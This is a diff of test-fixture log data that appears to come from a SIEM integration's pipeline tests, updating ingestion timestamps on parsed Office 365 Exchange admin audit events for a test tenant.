@@ -2669,7 +2669,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853135200Z", + "ingested": "2021-12-14T14:49:28.056962560Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2750,7 +2750,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853140400Z", + "ingested": "2021-12-14T14:49:28.056963128Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2831,7 +2831,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853145400Z", + "ingested": "2021-12-14T14:49:28.056963696Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2912,7 +2912,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853151200Z", + "ingested": "2021-12-14T14:49:28.056964433Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -2993,7 +2993,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853155300Z", + "ingested": "2021-12-14T14:49:28.056965019Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3074,7 +3074,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853159300Z", + "ingested": "2021-12-14T14:49:28.056965529Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3152,7 +3152,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853162700Z", + "ingested": "2021-12-14T14:49:28.056966070Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3222,7 +3222,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853167600Z", + "ingested": "2021-12-14T14:49:28.056966697Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3291,7 +3291,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853172700Z", + "ingested": "2021-12-14T14:49:28.056967232Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3360,7 +3360,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853177600Z", + "ingested": "2021-12-14T14:49:28.056967894Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3429,7 +3429,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853184200Z", + "ingested": "2021-12-14T14:49:28.056968541Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3512,7 +3512,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853190400Z", + "ingested": "2021-12-14T14:49:28.056969095Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3593,7 +3593,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853196300Z", + "ingested": "2021-12-14T14:49:28.056969599Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3674,7 +3674,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853203900Z", + "ingested": "2021-12-14T14:49:28.056970269Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 